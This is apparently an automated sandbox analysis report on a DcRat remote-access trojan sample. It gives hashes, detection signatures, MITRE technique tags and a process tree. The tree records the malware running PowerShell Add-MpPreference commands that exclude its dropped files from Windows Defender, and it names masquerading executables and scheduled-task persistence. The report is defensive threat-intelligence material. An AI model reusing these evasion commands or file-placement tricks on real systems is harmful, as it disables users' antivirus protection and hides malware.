dcrat | e683a0dd860be7f17cf4793cb24b20ee72c2b7f6739756630491a0344546b350

Analysis

max time kernel
149s
max time network
154s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
22-12-2024 07:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_e683a0dd860be7f17cf4793cb24b20ee72c2b7f6739756630491a0344546b350.exe
Size

1.3MB
MD5

ce8a640ac7cb5fed8541cf090291140b
SHA1

69815ac3f858c6151b96da0ee1836b839ea297c3
SHA256

e683a0dd860be7f17cf4793cb24b20ee72c2b7f6739756630491a0344546b350
SHA512

986cfef255a36e65398f25ae342473c15f3db019d73cb59082d637e272f2045f5e37390a95059d982e16b42375c40fa30734680b40ddd9baa67d5be7370c6a30
SSDEEP

24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Score

10^/10

dcrat discovery execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2604	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2256	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	944	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1660	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2064	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2024	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1172	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2348	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3044	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2192	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2340	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2104	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3024	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2120	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2940	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2932	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1176	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1976	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1536	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2292	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2456	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2576	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2280	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2300	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2424	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1540	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	980	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2532	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2428	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1848	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	948	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2644	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1748	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1812	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1372	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1216	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1132	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1924	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2384	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2036	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1060	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1092	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2032	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1720	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	664	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2216	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1608	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2892	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1372	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2228	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1688	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1388	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1828	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2348	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1140	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	316	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2176	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2008	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2940	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1500	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2224	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2372	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1612	2764	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1748	2764	schtasks.exe	34

DCRat payload 8 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x0008000000019394-10.dat	dcrat
behavioral1/memory/3012-13-0x0000000000F30000-0x0000000001040000-memory.dmp	dcrat
behavioral1/memory/1168-185-0x0000000000C40000-0x0000000000D50000-memory.dmp	dcrat
behavioral1/memory/2200-318-0x0000000000370000-0x0000000000480000-memory.dmp	dcrat
behavioral1/memory/2968-378-0x0000000001220000-0x0000000001330000-memory.dmp	dcrat
behavioral1/memory/2636-497-0x0000000000060000-0x0000000000170000-memory.dmp	dcrat
behavioral1/memory/1836-557-0x0000000001040000-0x0000000001150000-memory.dmp	dcrat
behavioral1/memory/1844-617-0x00000000012C0000-0x00000000013D0000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 25 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2256	powershell.exe
2936	powershell.exe
2988	powershell.exe
2876	powershell.exe
2096	powershell.exe
3040	powershell.exe
1616	powershell.exe
2984	powershell.exe
2804	powershell.exe
2160	powershell.exe
2908	powershell.exe
388	powershell.exe
2952	powershell.exe
972	powershell.exe
2672	powershell.exe
2912	powershell.exe
3068	powershell.exe
2360	powershell.exe
1108	powershell.exe
3004	powershell.exe
2976	powershell.exe
2964	powershell.exe
1376	powershell.exe
1476	powershell.exe
1444	powershell.exe

Executes dropped EXE 11 IoCs

pid	Process
3012	DllCommonsvc.exe
2692	DllCommonsvc.exe
1168	conhost.exe
2932	conhost.exe
2200	conhost.exe
2968	conhost.exe
2100	conhost.exe
2636	conhost.exe
1836	conhost.exe
1844	conhost.exe
2908	conhost.exe

Loads dropped DLL 2 IoCs

pid	Process
3008	cmd.exe
3008	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
19	raw.githubusercontent.com
23	raw.githubusercontent.com
27	raw.githubusercontent.com
30	raw.githubusercontent.com
12	raw.githubusercontent.com
16	raw.githubusercontent.com
9	raw.githubusercontent.com
4	raw.githubusercontent.com
5	raw.githubusercontent.com

Drops file in Program Files directory 11 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Windows Media Player\Network Sharing\b75386f1303e64	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Portable Devices\e978f868350d50	DllCommonsvc.exe
File created	C:\Program Files\MSBuild\Microsoft\lsm.exe	DllCommonsvc.exe
File created	C:\Program Files\MSBuild\Microsoft\101b941d020240	DllCommonsvc.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\6ccacd8608530f	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Media Player\Network Sharing\taskhost.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Portable Devices\powershell.exe	DllCommonsvc.exe
File opened for modification	C:\Program Files\MSBuild\Microsoft\lsm.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Idle.exe	DllCommonsvc.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\ja\OSPPSVC.exe	DllCommonsvc.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\ja\1610b97d3ab4a7	DllCommonsvc.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\es-ES\conhost.exe	DllCommonsvc.exe
File opened for modification	C:\Windows\es-ES\conhost.exe	DllCommonsvc.exe
File created	C:\Windows\es-ES\088424020bedd6	DllCommonsvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_e683a0dd860be7f17cf4793cb24b20ee72c2b7f6739756630491a0344546b350.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1608	schtasks.exe
1372	schtasks.exe
2064	schtasks.exe
2348	schtasks.exe
980	schtasks.exe
316	schtasks.exe
2192	schtasks.exe
1132	schtasks.exe
2724	schtasks.exe
2224	schtasks.exe
2256	schtasks.exe
944	schtasks.exe
1176	schtasks.exe
2576	schtasks.exe
1060	schtasks.exe
2032	schtasks.exe
2024	schtasks.exe
1748	schtasks.exe
1924	schtasks.exe
1092	schtasks.exe
1612	schtasks.exe
2340	schtasks.exe
948	schtasks.exe
1216	schtasks.exe
1720	schtasks.exe
664	schtasks.exe
2008	schtasks.exe
1660	schtasks.exe
2120	schtasks.exe
1812	schtasks.exe
3044	schtasks.exe
1536	schtasks.exe
2292	schtasks.exe
2532	schtasks.exe
2428	schtasks.exe
1848	schtasks.exe
2372	schtasks.exe
2932	schtasks.exe
2456	schtasks.exe
2384	schtasks.exe
1388	schtasks.exe
2348	schtasks.exe
1140	schtasks.exe
1172	schtasks.exe
2036	schtasks.exe
1828	schtasks.exe
2892	schtasks.exe
1500	schtasks.exe
3020	schtasks.exe
2940	schtasks.exe
2664	schtasks.exe
2104	schtasks.exe
1976	schtasks.exe
2280	schtasks.exe
1540	schtasks.exe
2228	schtasks.exe
2176	schtasks.exe
2604	schtasks.exe
2940	schtasks.exe
1688	schtasks.exe
1748	schtasks.exe
3048	schtasks.exe
3024	schtasks.exe
2300	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3012	DllCommonsvc.exe
3012	DllCommonsvc.exe
3012	DllCommonsvc.exe
2976	powershell.exe
2988	powershell.exe
3040	powershell.exe
2096	powershell.exe
972	powershell.exe
2876	powershell.exe
3004	powershell.exe
2936	powershell.exe
1476	powershell.exe
2912	powershell.exe
3068	powershell.exe
2672	powershell.exe
2964	powershell.exe
2692	DllCommonsvc.exe
2804	powershell.exe
2952	powershell.exe
2984	powershell.exe
1376	powershell.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe
2692	DllCommonsvc.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

description	pid	Process
Token: SeDebugPrivilege	3012	DllCommonsvc.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeDebugPrivilege	2988	powershell.exe
Token: SeDebugPrivilege	3040	powershell.exe
Token: SeDebugPrivilege	2096	powershell.exe
Token: SeDebugPrivilege	972	powershell.exe
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeDebugPrivilege	3004	powershell.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	1476	powershell.exe
Token: SeDebugPrivilege	2692	DllCommonsvc.exe
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	3068	powershell.exe
Token: SeDebugPrivilege	2672	powershell.exe
Token: SeDebugPrivilege	2964	powershell.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	2984	powershell.exe
Token: SeDebugPrivilege	1376	powershell.exe
Token: SeDebugPrivilege	388	powershell.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	2908	powershell.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	1168	conhost.exe
Token: SeDebugPrivilege	1108	powershell.exe
Token: SeDebugPrivilege	1444	powershell.exe
Token: SeDebugPrivilege	2932	conhost.exe
Token: SeDebugPrivilege	2200	conhost.exe
Token: SeDebugPrivilege	2968	conhost.exe
Token: SeDebugPrivilege	2100	conhost.exe
Token: SeDebugPrivilege	2636	conhost.exe
Token: SeDebugPrivilege	1836	conhost.exe
Token: SeDebugPrivilege	1844	conhost.exe
Token: SeDebugPrivilege	2908	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2248 wrote to memory of 2896	2248	JaffaCakes118_e683a0dd860be7f17cf4793cb24b20ee72c2b7f6739756630491a0344546b350.exe	30
PID 2248 wrote to memory of 2896	2248	JaffaCakes118_e683a0dd860be7f17cf4793cb24b20ee72c2b7f6739756630491a0344546b350.exe	30
PID 2248 wrote to memory of 2896	2248	JaffaCakes118_e683a0dd860be7f17cf4793cb24b20ee72c2b7f6739756630491a0344546b350.exe	30
PID 2248 wrote to memory of 2896	2248	JaffaCakes118_e683a0dd860be7f17cf4793cb24b20ee72c2b7f6739756630491a0344546b350.exe	30
PID 2896 wrote to memory of 3008	2896	WScript.exe	31
PID 2896 wrote to memory of 3008	2896	WScript.exe	31
PID 2896 wrote to memory of 3008	2896	WScript.exe	31
PID 2896 wrote to memory of 3008	2896	WScript.exe	31
PID 3008 wrote to memory of 3012	3008	cmd.exe	33
PID 3008 wrote to memory of 3012	3008	cmd.exe	33
PID 3008 wrote to memory of 3012	3008	cmd.exe	33
PID 3008 wrote to memory of 3012	3008	cmd.exe	33
PID 3012 wrote to memory of 2936	3012	DllCommonsvc.exe	83
PID 3012 wrote to memory of 2936	3012	DllCommonsvc.exe	83
PID 3012 wrote to memory of 2936	3012	DllCommonsvc.exe	83
PID 3012 wrote to memory of 2876	3012	DllCommonsvc.exe	84
PID 3012 wrote to memory of 2876	3012	DllCommonsvc.exe	84
PID 3012 wrote to memory of 2876	3012	DllCommonsvc.exe	84
PID 3012 wrote to memory of 2988	3012	DllCommonsvc.exe	85
PID 3012 wrote to memory of 2988	3012	DllCommonsvc.exe	85
PID 3012 wrote to memory of 2988	3012	DllCommonsvc.exe	85
PID 3012 wrote to memory of 2952	3012	DllCommonsvc.exe	86
PID 3012 wrote to memory of 2952	3012	DllCommonsvc.exe	86
PID 3012 wrote to memory of 2952	3012	DllCommonsvc.exe	86
PID 3012 wrote to memory of 972	3012	DllCommonsvc.exe	87
PID 3012 wrote to memory of 972	3012	DllCommonsvc.exe	87
PID 3012 wrote to memory of 972	3012	DllCommonsvc.exe	87
PID 3012 wrote to memory of 2984	3012	DllCommonsvc.exe	90
PID 3012 wrote to memory of 2984	3012	DllCommonsvc.exe	90
PID 3012 wrote to memory of 2984	3012	DllCommonsvc.exe	90
PID 3012 wrote to memory of 3004	3012	DllCommonsvc.exe	91
PID 3012 wrote to memory of 3004	3012	DllCommonsvc.exe	91
PID 3012 wrote to memory of 3004	3012	DllCommonsvc.exe	91
PID 3012 wrote to memory of 2096	3012	DllCommonsvc.exe	92
PID 3012 wrote to memory of 2096	3012	DllCommonsvc.exe	92
PID 3012 wrote to memory of 2096	3012	DllCommonsvc.exe	92
PID 3012 wrote to memory of 2976	3012	DllCommonsvc.exe	93
PID 3012 wrote to memory of 2976	3012	DllCommonsvc.exe	93
PID 3012 wrote to memory of 2976	3012	DllCommonsvc.exe	93
PID 3012 wrote to memory of 2964	3012	DllCommonsvc.exe	94
PID 3012 wrote to memory of 2964	3012	DllCommonsvc.exe	94
PID 3012 wrote to memory of 2964	3012	DllCommonsvc.exe	94
PID 3012 wrote to memory of 3040	3012	DllCommonsvc.exe	95
PID 3012 wrote to memory of 3040	3012	DllCommonsvc.exe	95
PID 3012 wrote to memory of 3040	3012	DllCommonsvc.exe	95
PID 3012 wrote to memory of 1476	3012	DllCommonsvc.exe	96
PID 3012 wrote to memory of 1476	3012	DllCommonsvc.exe	96
PID 3012 wrote to memory of 1476	3012	DllCommonsvc.exe	96
PID 3012 wrote to memory of 3068	3012	DllCommonsvc.exe	97
PID 3012 wrote to memory of 3068	3012	DllCommonsvc.exe	97
PID 3012 wrote to memory of 3068	3012	DllCommonsvc.exe	97
PID 3012 wrote to memory of 2912	3012	DllCommonsvc.exe	98
PID 3012 wrote to memory of 2912	3012	DllCommonsvc.exe	98
PID 3012 wrote to memory of 2912	3012	DllCommonsvc.exe	98
PID 3012 wrote to memory of 2804	3012	DllCommonsvc.exe	99
PID 3012 wrote to memory of 2804	3012	DllCommonsvc.exe	99
PID 3012 wrote to memory of 2804	3012	DllCommonsvc.exe	99
PID 3012 wrote to memory of 1376	3012	DllCommonsvc.exe	100
PID 3012 wrote to memory of 1376	3012	DllCommonsvc.exe	100
PID 3012 wrote to memory of 1376	3012	DllCommonsvc.exe	100
PID 3012 wrote to memory of 2672	3012	DllCommonsvc.exe	101
PID 3012 wrote to memory of 2672	3012	DllCommonsvc.exe	101
PID 3012 wrote to memory of 2672	3012	DllCommonsvc.exe	101
PID 3012 wrote to memory of 2692	3012	DllCommonsvc.exe	112

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_e683a0dd860be7f17cf4793cb24b20ee72c2b7f6739756630491a0344546b350.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_e683a0dd860be7f17cf4793cb24b20ee72c2b7f6739756630491a0344546b350.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2248
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\providercommon\1zu9dW.bat" "
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3008
  - - C:\providercommon\DllCommonsvc.exe
      "C:\providercommon\DllCommonsvc.exe"
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3012
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2936
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\lsm.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2876
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\MSBuild\Microsoft\Idle.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2988
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\lsass.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2952
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\dwm.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:972
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\winlogon.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2984
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\spoolsv.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3004
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\services.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2096
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\ja\OSPPSVC.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2976
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Media Player\Network Sharing\taskhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2964
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\taskhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3040
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\spoolsv.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1476
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\OSPPSVC.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3068
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\WmiPrvSE.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2912
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\spoolsv.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2804
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\cmd.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1376
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Documents\Idle.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2672
    - - C:\providercommon\DllCommonsvc.exe
        
        "C:\providercommon\DllCommonsvc.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2692
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
